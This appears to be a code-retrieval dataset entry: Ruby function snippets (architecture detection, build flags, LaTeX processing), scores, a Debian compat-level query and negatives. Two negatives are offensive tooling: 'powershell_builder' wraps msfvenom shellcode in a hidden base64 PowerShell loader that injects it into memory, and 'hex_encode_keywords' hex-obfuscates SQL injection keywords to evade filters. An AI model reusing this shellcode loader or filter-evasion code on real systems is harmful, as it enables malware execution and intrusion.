"def post_process_text(s) \n # extract math\n math, arrays = [], []\n s.scan(/\\$([^$]+)\\$/) {|m| math << m } # $$\n s.scan(/\\\\\\[([^$]+)\\\\\\]/) {|m| arrays << m } # \\[ \\]\n # citations\n s = replace_citations(s)\n # listings, algorithms, tables\n s = replace_listings(s)\n # custom \n s = replace_custom_refs(s)\n # texttt\n s = replace_texttt(s)\n # emph\n s = replace_emph(s)\n # textbf\n s = replace_bf(s)\n # urls\n s = replace_urls(s)\n # footnotes\n s = replace_footnotes(s)\n # paragrams\n s = replace_paragraphs(s)\n # chapter refs\n s = replace_chapter_refs(s)\n # section refs\n s = remove_section_refs(s)\n # replace markboth with nothing\n s = replace_markboth(s)\n # remove hypenation suggestions\n s = remove_hyph_suggestions(s)\n # umlats etc\n s = character_processing(s)\n # replace \\% with %\n s = s.gsub(\"\\\\%\", \"\\%\")\n # replace \"\\ \" with a space\n s = s.gsub(\"\\\\ \", \" \")\n # replace \\\" and \\' with nothing\n s = s.gsub(\"\\\\\\\"\", \"\")\n s = s.gsub(\"\\\\\\'\", \"\")\n # replace ~ with space\n s = s.gsub(\"~\", \" \")\n # replace \\$ with $ (testing algorithms)\n s = s.gsub(\"\\\\$\", \"$\")\n # replace \\_ with _ (testing algorithms)\n s = s.gsub(\"\\\\_\", \"_\") \n # replace \\# with # (appendix)\n s = s.gsub(\"\\\\#\", \"#\")\n # replace \\{ with { (appendix)\n s = s.gsub(\"\\\\{\", \"{\")\n # replace \\} with } (appendix)\n s = s.gsub(\"\\\\}\", \"}\") \n # replace \\\\ with <br /> (appendix, de)\n s = s.gsub(\"\\\\\\\\\", \"<br />\") \n # replace \\Latex with LaTex\n s = s.gsub(\"\\\\LaTeX\", \"LaTex\") \n # replace \\copyright with html copyright\n s = s.gsub(\"\\\\copyright\", \"©\")\n # replace \\mybookdate\\ with publication date 2011\n s = s.gsub(\"\\\\mybookdate\", DATE)\n # replace \\mybookauthor with the author ame\n s = s.gsub(\"\\\\mybookauthor\", \"Jason Brownlee\")\n # replace \\mybooktitle with the book title\n s = s.gsub(\"\\\\mybooktitle\", TITLE)\n # replace \\mybooksubtitle with the book subtitle\n s = s.gsub(\"\\\\mybooksubtitle\", SUBTITLE)\n # finally switch ` for ' (late in the subs)\n s = s.gsub(\"`\", \"'\")\n \n # put the math back\n if !math.empty?\n index = 0\n s = s.gsub(/\\$([^$]+)\\$/) do |m|\n index += 1\n \"$#{math[index - 1]}$\"\n end\n end \n if !arrays.empty?\n index = 0\n s = s.gsub(/\\\\\\[([^$]+)\\\\\\]/) do |m|\n index += 1\n \"\\\\[#{arrays[index - 1]}\\\\]\"\n end\n end\n return s\nend",
"def architect\n map_field(:architect)&.map { |a| a.gsub(/ \\$[a-z] /, ' ') }\n end",
"def show_machine_arch\n\t\t\tputs \" Machine: #{ELF_MACHINE_ARCH_LIST[@elf_machine.to_i]} (#{@elf_machine.to_i})\"\n\t\tend",
"def arch_32_bit; :i386; end",
"def add_priv_assm\n libruby_regex = /msvcrt-ruby\\d+\\.dll$/i\n bin_dir = File.join D_INSTALL, \"bin\"\n Dir.chdir(bin_dir) { |d|\n libruby = Dir['*.dll'].grep(libruby_regex)[0]\n new = <<-EOT\n <dependency>\n <dependentAssembly>\n <assemblyIdentity version='1.0.0.0' type='win32' name='ruby_builtin_dlls'/>\n </dependentAssembly>\n </dependency>\n <file name='#{libruby}'/>\nEOT\n ['ruby.exe', 'rubyw.exe'].each { |fn|\n image = File.binread(fn)\n image.gsub!(/<\\?xml.*?<assembly.*?<\\/assembly>\\s+/m) { |m|\n orig_len = m.bytesize\n newm = m.gsub(/^\\s*<\\/assembly>/, \"#{new}</assembly>\")\n # shorten to match original\n newm.gsub!(/<!--The ID below indicates application support for/, '<!--') if newm.bytesize > orig_len\n newm.gsub!(/^ *<!--.*?-->\\n/m, \"\") if newm.bytesize > orig_len\n newm.gsub!(/^ +/, \"\") if newm.bytesize > orig_len\n raise \"replacement manifest too big #{m.bytesize} < #{newm.bytesize}\" if m.bytesize < newm.bytesize\n newm + \" \" * (orig_len - newm.bytesize)\n }\n File.binwrite(fn, image)\n }\n }\n end",
"def enable_i386_arch!\n execute 'dpkg --add-architecture i386' do\n only_if do\n cmd = 'dpkg --print-architecture; ' \\\n 'dpkg --print-foreign-architectures'\n !shell_out!(cmd).stdout.lines.include?('i386')\n end\n notifies :run, 'execute[apt-get update]', :immediately\n end\n end",
"def get_ay_fusion_guest_os(options)\n guest_os = \"sles11\"\n if not options['arch'].to_s.match(/i386/) and not options['arch'].to_s.match(/64/)\n guest_os = guest_os+\"-64\"\n end\n return guest_os\nend",
"def arch_lookup(sys_type)\n return \"x86_64\" if sys_type == \"x64-based PC\"\n return \"i386\" if sys_type == \"X86-based PC\"\n\n sys_type\n end",
"def build filetask,system_config,platform\n cmd_file=command_file(filetask.name,system_config,platform)\n if File.exists?(cmd_file)\n config=system_config.platform_config(platform)\n if cmd_file.end_with?('.library')\n cmdline = librarian(cmd_file,config)\n else\n cmdline = linker(cmd_file,config)\n end\n sh(cmdline.join(' '))\n else\n raise GaudiError, \"Missing command file for #{filetask.name}\"\n end\n end",
"def arch\n return `uname -m`.chomp\n end",
"def esc!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in(__method__, 46)\n\n \n # - - - - main rule block - - - -\n # at line 504:7: '\\\\\\\\' ( 'n' | 'r' | 't' | 'b' | 'f' | '\\\"' | '\\\\'' | '\\\\\\\\' | '>' | 'u' XDIGIT XDIGIT XDIGIT XDIGIT | . )\n match(?\\\\)\n # at line 505:3: ( 'n' | 'r' | 't' | 'b' | 'f' | '\\\"' | '\\\\'' | '\\\\\\\\' | '>' | 'u' XDIGIT XDIGIT XDIGIT XDIGIT | . )\n alt_9 = 11\n alt_9 = @dfa9.predict(@input)\n case alt_9\n when 1\n # at line 505:5: 'n'\n match(?n)\n\n when 2\n # at line 506:5: 'r'\n match(?r)\n\n when 3\n # at line 507:5: 't'\n match(?t)\n\n when 4\n # at line 508:5: 'b'\n match(?b)\n\n when 5\n # at line 509:5: 'f'\n match(?f)\n\n when 6\n # at line 510:5: '\\\"'\n match(?\")\n\n when 7\n # at line 511:5: '\\\\''\n match(?\\')\n\n when 8\n # at line 512:5: '\\\\\\\\'\n match(?\\\\)\n\n when 9\n # at line 513:5: '>'\n match(?>)\n\n when 10\n # at line 514:5: 'u' XDIGIT XDIGIT XDIGIT XDIGIT\n match(?u)\n xdigit!\n xdigit!\n xdigit!\n xdigit!\n\n when 11\n # at line 515:5: .\n match_any\n\n end\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out(__method__, 46)\n\n end",
"def safe_architecture\n if intel?\n \"i386\"\n elsif sparc?\n \"sparc\"\n else\n Ohai[\"kernel\"][\"machine\"]\n end\n end",
"def format_ruby_command(shell_script_file_path, *arguments)\n return format_executable_command(sandbox_ruby, *([shell_script_file_path] + arguments))\n end",
"def setup\n bin = File.basename $0\n name = bin.underscore\n\n erb_src_path = ::Thor::ROOT.join 'support',\n 'completion',\n 'complete.inc.bash.erb'\n\n erb_src = erb_src_path.read\n\n bash_src = binding.erb erb_src\n\n puts bash_src\n\n nil\n end",
"def tralics_commands\n base_commands = <<-'EOS'\n% Commands specific to Tralics\n\\def\\hyperref[#1]#2{\\xmlelt{a}{\\XMLaddatt{target}{#1}#2}}\n\\newcommand{\\heading}[1]{\\xmlelt{heading}{#1}}\n\\newcommand{\\codecaption}[1]{\\xmlelt{heading}{#1}}\n\\newcommand{\\sout}[1]{\\xmlelt{sout}{#1}}\n\\newcommand{\\kode}[1]{\\xmlelt{kode}{#1}}\n\\newcommand{\\coloredtext}[2]{\\xmlelt{coloredtext}{\\AddAttToCurrent{color}{#1}#2}}\n\\newcommand{\\coloredtexthtml}[2]{\\xmlelt{coloredtexthtml}{\\AddAttToCurrent{color}{#1}#2}}\n\\newcommand{\\filepath}[1]{\\xmlelt{filepath}{#1}}\n\\newcommand{\\image}[1]{\\xmlelt{image}{#1}}\n\\newcommand{\\imagebox}[1]{\\xmlelt{imagebox}{#1}}\n% Ignore pbox argument, just replacing with content.\n\\newcommand{\\pbox}[2]{#2}\n% Ignore some other commands.\n\\newcommand{\\includepdf}[1]{}\n\\newcommand{\\newunicodechar}[2]{}\n\\newcommand{\\extrafloats}[1]{}\n EOS\n custom_commands = <<-EOS\n\\\\usepackage{amsthm}\n\\\\theoremstyle{definition}\n\\\\newtheorem{codelisting}{#{language_labels[\"listing\"]}}[chapter]\n\\\\newtheorem{aside}{#{language_labels[\"aside\"]}}[chapter]\n EOS\n [base_commands, custom_commands].join(\"\\n\")\n end",
"def hex_encode_keywords\n if self =~ /(select)/i\n foo=$1\n newstr = self.gsub(foo, foo.gsub(/e/i, \"%#{'e'.hexme}\"))\n else\n newstr = self\n end\n if newstr =~ /(update)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.sub(/p/i, \"%#{'p'.hexme}\"))\n end\n if newstr =~ /(insert)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.sub(/s/i, \"%#{'s'.hexme}\"))\n end\n if newstr =~ /(delete)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.sub(/l/i, \"%#{'l'.hexme}\"))\n end\n if newstr =~ /(union)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.gsub(/n/i, \"%#{'n'.hexme}\"))\n end\n if newstr =~ /[, ](concat)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.gsub(/c/i, \"%#{'c'.hexme}\"))\n end\n if newstr =~ /(group_concat)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.gsub(/o/i, \"%#{'o'.hexme}\"))\n end\n if newstr =~ /(information_schema)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.gsub(/a/i, \"%#{'a'.hexme}\"))\n end\n if newstr =~ /(cast)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.sub(/t/i, \"%#{'t'.hexme}\"))\n end\n if newstr =~ /(convert)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.sub(/v/i, \"%#{'v'.hexme}\"))\n end\n if newstr =~ /(substring)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.gsub(/s/i, \"%#{'s'.hexme}\"))\n end\n if newstr =~ /(sleep)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.sub(/p/i, \"%#{'p'.hexme}\"))\n end\n if newstr =~ /(benchmark)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.sub(/b/i, \"%#{'b'.hexme}\"))\n end\n return newstr\n end",
"def create_md tool\n \n original = tool[1].split(\"\\n\")\n new = []\n note = false\n\n # Cambia las rutas y < y > por código HTML\n def diple l\n return l.gsub('de +++YAML+++ en <http://pecas.cliteratu.re>', 'de [+++YAML+++](yaml.html)')\n .gsub('de JavaScript en <http://pecas.cliteratu.re>', 'de [JavaScript](js.html)')\n .gsub('Lista de acrónimos: <https://github.com/tesseract-ocr/tesseract/blob/master/doc/tesseract.1.asc#languages>', '[Lista de acrónimos](https://github.com/tesseract-ocr/tesseract/blob/master/doc/tesseract.1.asc#languages)')\n .gsub('<','<').gsub('>','>')\n end\n\n # Agrega versalitas\n def smallcaps l\n return l.gsub(/([A-Z]{3,})/, '+++\\1+++')\n end\n\n # Cambia comillas por sintaxis para línea de código\n def to_code l\n return l.gsub(/«(.+?)»/, '`\\1`')\n end\n\n # Añade líneas de código en las opciones\n def to_code_option l\n return l.gsub(/^(\\S+)/, '`\\1`')\n end\n\n new.push('# ' + $l_g_pc_docs_creation + '`' + tool[0] + '`')\n\n original.each_with_index do |l, i|\n\n l = to_code(diple(smallcaps(l)))\n\n if l =~ /^\\S/\n # Encabezados 2\n if l !~ /^Nota/ && i != 1\n new.push('## ' + l + \"\\n\\n\")\n # Párrafos\n else\n # Notas\n if l =~ /^Nota/\n if !note\n new.push(\"--- {.espacio-arriba3}\\n\\n\")\n note = true\n new.push(l + ' {.espacio-arriba3}')\n else\n new.push(l + ' {.espacio-arriba1 .sin-sangria}')\n end \n # Descripción\n else\n # Esto servirá para crear «herramientas.md»\n $tools_md[\"#{tool[0]}\"] = [tool[0], l.gsub(/^\\S+\\s+/, '')]\n new.push(l)\n end\n end\n else\n if l.strip != ''\n l = l.strip\n\n # Opciones de Pecas\n if l =~ /^-/\n new.push('* ' + to_code_option(l))\n # Comandos de Pecas\n elsif l =~ /^pc-/\n new.push('```')\n new.push(l)\n new.push('```')\n # Explicaciones\n elsif l =~ /^[A-Z]/\n new.push(\"\\n\" + l)\n # Dependencias / Tipos\n else\n # Evita que se quede como línea de código el tipo y su descripción\n l_final = []\n l.split(/\\s+/).each_with_index do |ll, i|\n # Solo la primera palabra se va como código\n if i == 0\n l_final.push('* `' + ll + '`')\n # El resto de las palabras se quedan como texto\n else\n l_final.push(ll)\n end\n end\n new.push(l_final.join(' '))\n end\n # Líneas en blanco\n else\n new.push(l)\n end\n end\n end\n\n\tarchivo = File.new(Dir.pwd + '/md/' + tool[0] + '.md', 'w:UTF-8')\n\tarchivo.puts new\n\tarchivo.close\nend",
"def suse_linux_type\n if @suse_linux_type.nil?\n out = nil\n text = FilePath.new(\"/etc/SuSE-release\").suck_file\n unless text.nil?\n if text =~ /suse/i\n out = \"sl\"\n out += \"es\" if text =~ /enterprise\\s*server/i\n out += \"%s\" % $1 if text =~ /^[^\\d]+(\\d+)/i\n end\n end\n \n @suse_linux_type = out\n end\n \n @suse_linux_type\n end",
"def shell_string!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 2 )\n\n type = SHELL_STRING\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 20:5: '`' (~ ( '`' | '\\\\\\\\' ) | '\\\\\\\\' . )* '`'\n match( 0x60 )\n # at line 20:9: (~ ( '`' | '\\\\\\\\' ) | '\\\\\\\\' . )*\n while true # decision 4\n alt_4 = 3\n look_4_0 = @input.peek( 1 )\n\n if ( look_4_0.between?( 0x0, 0x5b ) || look_4_0.between?( 0x5d, 0x5f ) || look_4_0.between?( 0x61, 0xffff ) )\n alt_4 = 1\n elsif ( look_4_0 == 0x5c )\n alt_4 = 2\n\n end\n case alt_4\n when 1\n # at line 20:11: ~ ( '`' | '\\\\\\\\' )\n if @input.peek( 1 ).between?( 0x0, 0x5b ) || @input.peek( 1 ).between?( 0x5d, 0x5f ) || @input.peek( 1 ).between?( 0x61, 0xff )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n end\n\n\n\n when 2\n # at line 20:27: '\\\\\\\\' .\n match( 0x5c )\n match_any\n\n else\n break # out of loop for decision 4\n end\n end # loop for decision 4\n match( 0x60 )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 2 )\n\n end",
"def objdump_arch(arch)\n case arch\n when :amd64 then 'i386:x86-64'\n else arch.to_s\n end\n end",
"def powershell_prefix\n [\n Mixlib::Install::Generator::PowerShell.get_script(\"helpers.ps1\"),\n \"$platform_architecture = Get-PlatformArchitecture\",\n \"$platform_version = Get-PlatformVersion\",\n ].join(\"\\n\")\n end",
"def mock_to_dist_version_arch(mock)\n # We care about matching against two patterns here:\n # pupent-3.4-el5-i386 <= old style with PE_VER baked into the mock name\n # pupent-el5-i386 <= new style derived from a template\n mock.match(/pupent(-\\d\\.\\d)?-([a-z]*)(\\d*)-([^-]*)/)[2..4]\n end",
"def arch?(node = __getnode)\n node[\"platform_family\"] == \"arch\"\n end",
"def to_ruby\n mark_version\n result = []\n result << \"# -*- encoding: utf-8 -*-\"\n result << \"#{Gem::StubSpecification::PREFIX}#{name} #{version} #{platform} #{raw_require_paths.join(\"\\0\")}\"\n result << \"#{Gem::StubSpecification::PREFIX}#{extensions.join \"\\0\"}\" unless\n extensions.empty?\n result << nil\n result << \"Gem::Specification.new do |s|\"\n\n result << \" s.name = #{ruby_code name}\"\n result << \" s.version = #{ruby_code version}\"\n unless platform.nil? or platform == Gem::Platform::RUBY\n result << \" s.platform = #{ruby_code original_platform}\"\n end\n result << \"\"\n result << \" s.required_rubygems_version = #{ruby_code required_rubygems_version} if s.respond_to? :required_rubygems_version=\"\n\n if metadata and !metadata.empty?\n result << \" s.metadata = #{ruby_code metadata} if s.respond_to? :metadata=\"\n end\n result << \" s.require_paths = #{ruby_code raw_require_paths}\"\n\n handled = [\n :dependencies,\n :name,\n :platform,\n :require_paths,\n :required_rubygems_version,\n :specification_version,\n :version,\n :has_rdoc,\n :default_executable,\n :metadata,\n :signing_key,\n ]\n\n @@attributes.each do |attr_name|\n next if handled.include? attr_name\n current_value = self.send(attr_name)\n if current_value != default_value(attr_name) || self.class.required_attribute?(attr_name)\n result << \" s.#{attr_name} = #{ruby_code current_value}\"\n end\n end\n\n if String === signing_key\n result << \" s.signing_key = #{signing_key.dump}.freeze\"\n end\n\n if @installed_by_version\n result << nil\n result << \" s.installed_by_version = \\\"#{Gem::VERSION}\\\" if s.respond_to? :installed_by_version\"\n end\n\n unless dependencies.empty?\n result << nil\n result << \" if s.respond_to? :specification_version then\"\n result << \" s.specification_version = #{specification_version}\"\n result << \" end\"\n result << nil\n\n result << \" if s.respond_to? :add_runtime_dependency then\"\n\n dependencies.each do |dep|\n req = dep.requirements_list.inspect\n dep.instance_variable_set :@type, :runtime if dep.type.nil? # HACK\n result << \" s.add_#{dep.type}_dependency(%q<#{dep.name}>.freeze, #{req})\"\n end\n\n result << \" else\"\n dependencies.each do |dep|\n version_reqs_param = dep.requirements_list.inspect\n result << \" s.add_dependency(%q<#{dep.name}>.freeze, #{version_reqs_param})\"\n end\n result << \" end\"\n end\n\n result << \"end\"\n result << nil\n\n result.join \"\\n\"\n end",
"def compile_to_ruby\n \"\"\n end",
"def run_command_with_os_architecture(script, interpreter, options)\n options ||= {}\n options = options.dup\n arch = options.delete(:architecture)\n\n with_os_architecture(nil, architecture: arch) do\n shell_out(\n build_powershell_command(script, interpreter),\n **options\n )\n end\n end",
"def powershell_builder(venomstring)\n if File.exists?(\"#{MSFPATH}msfvenom\")\n # venomstring should be the arguments needed for msfvenom to build the base payload/shellcode ('-p <payload> LHOST=<ip> LPORT=<port>'\n shellcode=\"#{`#{MSFPATH}msfvenom #{venomstring} -b \\\\x00`}\".gsub(\";\", \"\").gsub(\" \", \"\").gsub(\"+\", \"\").gsub('\"', \"\").gsub(\"\\n\", \"\").gsub('buf=','').strip.gsub('\\\\',',0').sub(',', '')\n #\t=> yields a variable holding our escapped shellcode with ',' between each char.....\n\n puts \"[\".light_blue + \"*\".white + \"]\".light_blue + \" Converting Base ShellCode to PowerShell friendly format.....\".white\n # Borrowed from one of several appearances across the many Python written scripts....\n ps_base = \"$code = '[DllImport(\\\"kernel32.dll\\\")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport(\\\"kernel32.dll\\\")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport(\\\"msvcrt.dll\\\")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$winFunc = Add-Type -memberDefinition $code -Name \\\"Win32\\\" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc64 = %s;[Byte[]]$sc = $sc64;$size = 0x1000;if ($sc.Length -gt 0x1000) {$size = $sc.Length};$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };\"\n # => Our base PowerShell wrapper to get the job done now in var\n # => place our shellcode in the placeholders\n ps_base_cmd = ps_base.sub('%s', shellcode) \n # Prep it for final stages and put in funky ps format....\n ps_cmd_prepped=String.new\n ps_base_cmd.scan(/./) {|char| ps_cmd_prepped += char + \"\\x00\" }\n\n # Base64 Encode our Payload so it is primed & ready for PowerShell usage\n stager = Base64.encode64(\"#{ps_cmd_prepped}\")\n\n # The magic is now ready!\n ps_cmd = 'powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand ' + stager.gsub(\"\\n\", '')\n return ps_cmd\n else\n puts \"[\".light_red + \"*\".white + \"]\".light_red + \" Can't find MSFVENOM to build payloads!\".white\n puts \"[\".light_red + \"*\".white + \"]\".light_red + \" Check or provide MSF Path in source to correct......\".white\n return nil\n end\nend",
"def with_standard_compiler_flags(env = {}, opts = {})\n env ||= {}\n opts ||= {}\n compiler_flags =\n case Ohai[\"platform\"]\n when \"aix\"\n {\n \"CC\" => \"xlc_r -q64\",\n \"CXX\" => \"xlC_r -q64\",\n \"CFLAGS\" => \"-q64 -I#{install_dir}/embedded/include -D_LARGE_FILES -O\",\n \"LDFLAGS\" => \"-q64 -L#{install_dir}/embedded/lib -Wl,-blibpath:#{install_dir}/embedded/lib:/usr/lib:/lib\",\n \"LD\" => \"ld -b64\",\n \"OBJECT_MODE\" => \"64\",\n \"ARFLAGS\" => \"-X64 cru\",\n }\n when \"solaris2\"\n {\n \"CC\" => \"gcc -m64 -static-libgcc\",\n \"LDFLAGS\" => \"-Wl,-rpath,#{install_dir}/embedded/lib -L#{install_dir}/embedded/lib -static-libgcc\",\n \"CFLAGS\" => \"-I#{install_dir}/embedded/include -O2\",\n }\n when \"freebsd\"\n {\n \"CC\" => \"clang\",\n \"CXX\" => \"clang++\",\n \"LDFLAGS\" => \"-L#{install_dir}/embedded/lib -Wl,-rpath,#{install_dir}/embedded/lib\",\n \"CFLAGS\" => \"-I#{install_dir}/embedded/include -O3 -D_FORTIFY_SOURCE=2 -fstack-protector\",\n }\n when \"windows\"\n arch_flag = windows_arch_i386? ? \"-m32\" : \"-m64\"\n opt_flag = windows_arch_i386? ? \"-march=i686\" : \"-march=x86-64\"\n {\n \"LDFLAGS\" => \"-L#{install_dir}/embedded/lib #{arch_flag} -fno-lto\",\n # We do not wish to enable SSE even though we target i686 because\n # of a stack alignment issue with some libraries. We have not\n # exactly ascertained the cause but some compiled library/binary\n # violates gcc's assumption that the stack is going to be 16-byte\n # aligned which is just fine as long as one is pushing 32-bit\n # values from general purpose registers but stuff hits the fan as\n # soon as gcc emits aligned SSE xmm register spills which generate\n # GPEs and terminate the application very rudely with very little\n # to debug with.\n \"CFLAGS\" => \"-I#{install_dir}/embedded/include #{arch_flag} -O3 #{opt_flag}\",\n }\n else\n {\n \"LDFLAGS\" => \"-Wl,-rpath,#{install_dir}/embedded/lib -L#{install_dir}/embedded/lib\",\n \"CFLAGS\" => \"-I#{install_dir}/embedded/include -O3 -D_FORTIFY_SOURCE=2 -fstack-protector\",\n }\n end\n\n # merge LD_RUN_PATH into the environment. most unix distros will fall\n # back to this if there is no LDFLAGS passed to the linker that sets\n # the rpath. the LDFLAGS -R or -Wl,-rpath will override this, but in\n # some cases software may drop our LDFLAGS or think it knows better\n # and edit them, and we *really* want the rpath setting and do know\n # better. in that case LD_RUN_PATH will probably survive whatever\n # edits the configure script does\n extra_linker_flags = {\n \"LD_RUN_PATH\" => \"#{install_dir}/embedded/lib\",\n }\n\n if solaris2?\n ld_options = \"-R#{install_dir}/embedded/lib\"\n\n if platform_version.satisfies?(\"<= 5.10\")\n # in order to provide compatibility for earlier versions of libc on solaris 10,\n # we need to specify a mapfile that restricts the version of system libraries\n # used. See http://docs.oracle.com/cd/E23824_01/html/819-0690/chapter5-1.html\n # for more information\n # use the mapfile if it exists, otherwise ignore it\n mapfile_path = File.expand_path(Config.solaris_linker_mapfile, Config.project_root)\n ld_options << \" -M #{mapfile_path}\" if File.exist?(mapfile_path)\n end\n\n # solaris linker can also use LD_OPTIONS, so we throw the kitchen sink against\n # the linker, to find every way to make it use our rpath. This is also required\n # to use the aforementioned mapfile.\n extra_linker_flags[\"LD_OPTIONS\"] = ld_options\n end\n\n env.merge(compiler_flags)\n .merge(extra_linker_flags).\n # always want to favor pkg-config from embedded location to not hose\n # configure scripts which try to be too clever and ignore our explicit\n # CFLAGS and LDFLAGS in favor of pkg-config info\n merge({ \"PKG_CONFIG_PATH\" => \"#{install_dir}/embedded/lib/pkgconfig\" }).\n # Set default values for CXXFLAGS and CPPFLAGS.\n merge(\"CXXFLAGS\" => compiler_flags[\"CFLAGS\"])\n .merge(\"CPPFLAGS\" => compiler_flags[\"CFLAGS\"])\n .merge(\"OMNIBUS_INSTALL_DIR\" => install_dir)\n end",
"def file_task(re, runtime, signature, version, rb, rbc)\n rbc ||= rb.sub(re, \"runtime/#{version}\") + \"c\"\n\n file rbc => [rb, signature]\n runtime << rbc\nend",
"def set_platform_opts\n\n # Expand any embedded variables (like '$(CC)')\n CONFIG[\"CC\"] = RbConfig::CONFIG[\"CC\"]\n CONFIG[\"LDSHARED\"] = RbConfig::CONFIG[\"LDSHARED\"]\n\n # Make sure we have a CXX value (sometimes there isn't one)\n CONFIG[\"CXX\"] = CONFIG[\"CC\"] unless CONFIG.has_key?(\"CXX\")\n\n # O/S specific oddities\n\n case p4osname\n when /DARWIN/\n CONFIG['CC'] = 'xcrun c++'\n CONFIG['CXX'] = 'xcrun c++'\n CONFIG['LDSHARED'] = CONFIG['CXX'] + ' -bundle'\n when /FREEBSD/, /LINUX/\n # FreeBSD 6 and some Linuxes use 'cc' for linking by default. The\n # gcc detection patterns above won't catch that, so for these\n # platforms, we specifically convert cc to c++.\n CONFIG['LDSHARED'].sub!(/^cc/, 'c++')\n when /MINGW32/\n # When building with MinGW we need to statically link libgcc\n # and make sure we're linking with gcc and not g++. On older\n # Rubies, they use LDSHARED; newer ones (>=1.9) use LDSHAREDXX\n CONFIG['LDSHARED'].sub!(/g\\+\\+/, 'gcc')\n CONFIG['LDSHAREDXX'].sub!(/g\\+\\+/, 'gcc')\n CONFIG['LDSHARED'] = CONFIG['LDSHARED'] + ' -static-libgcc'\n CONFIG['LDSHAREDXX'] = CONFIG['LDSHARED'] + ' -static-libgcc'\n end\nend",
"def extract(contents)\n file_text, matches = parse(contents)\n\n extracted_ruby = +''\n\n last_match = [0, 0]\n matches.each_with_index do |(start_index, end_index), index|\n handle_region_before(start_index, last_match.last, file_text, extracted_ruby)\n\n match_marker = \"#{region_start_marker}_#{format('%010d', index + 1)}\" if region_start_marker\n extracted_ruby << extract_match(file_text, start_index, end_index, match_marker)\n\n last_match = [start_index, end_index]\n end\n\n extracted_ruby << file_text[last_match.last..-1].gsub(/./, ' ')\n\n # if we replaced <%== with <%= raw, try to shift the columns back to the\n # left so they match the original again\n extracted_ruby.gsub!(/ raw/, 'raw')\n\n extracted_ruby\n end",
"def yum_repo_platform_string\n platform = platform?('fedora') ? 'fedora' : 'rhel'\n release = platform?('amazon') ? '7' : '$releasever'\n \"#{platform}-#{release}-$basearch\"\n end"
] | [
"0.5715107",
"0.5702827",
"0.5696714",
"0.560849",
"0.533406",
"0.5309851",
"0.5295959",
"0.5290549",
"0.5278227",
"0.52700776",
"0.52656204",
"0.5238063",
"0.52332914",
"0.521695",
"0.5212728",
"0.521216",
"0.5198948",
"0.5113907",
"0.50973797",
"0.50776345",
"0.50765723",
"0.50410503",
"0.50288564",
"0.502854",
"0.50207114",
"0.50189906",
"0.50156325",
"0.4997255",
"0.4991878",
"0.49809667",
"0.49808553",
"0.49630272",
"0.49524066",
"0.49446306",
"0.49429014",
"0.49312183",
"0.49271193",
"0.49254408",
"0.49068528",
"0.49057215",
"0.48958224",
"0.48945555",
"0.48931578",
"0.48895195",
"0.48866978",
"0.48817018",
"0.48773223",
"0.48764557",
"0.48757845",
"0.4867624",
"0.4849564",
"0.4827327",
"0.4826673",
"0.48241496",
"0.48227462",
"0.48167363",
"0.48107046",
"0.48035482",
"0.47996077",
"0.47844324",
"0.47835627",
"0.47770554",
"0.47746047",
"0.4773452",
"0.47709844",
"0.47671124",
"0.4757899",
"0.47487652",
"0.47482827",
"0.47481284",
"0.47436237",
"0.47419044",
"0.47405764",
"0.47367078",
"0.4735782",
"0.47334886",
"0.47319683",
"0.47285962",
"0.47252917",
"0.4725229",
"0.47250533",
"0.47235373",
"0.47221255",
"0.47196704",
"0.47101223",
"0.47047874",
"0.47028524",
"0.47004542",
"0.46875578",
"0.46868965",
"0.46855888",
"0.46820882",
"0.4679388",
"0.4678937",
"0.46715823",
"0.4666891",
"0.46621957",
"0.4661962",
"0.46578386",
"0.46527994"
] | 0.68672913 | 0 |
Define the default compat level | def set_compat_level(compatlevel = DEBHELPER_DEFAULT_COMPAT_LEVEL, compatfile = "debian/compat")
if File.exist?(compatfile)
existing_compatlevel = `cat #{compatfile}`.strip
Packager.warn "Apaka::Packaging::Debian::set_compat_level: existing '#{compatfile}' with compatlevel #{existing_compatlevel}"
end
Packager.info "Setting debian compat level to: #{compatlevel}"
`echo #{compatlevel} > #{compatfile}`
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def bump_level\n return :major if @options[:major]\n return :minor if @options[:minor]\n return :patch if @options[:patch]\n end",
"def compat\n\t\tmodule_info['Compat'] || {}\n\tend",
"def level\n [MAJOR, MINOR, PATCH, PRE].compact.join(\".\")\n end",
"def compatibility_mode(compatibility = 1)\n @compatibility = compatibility\n end",
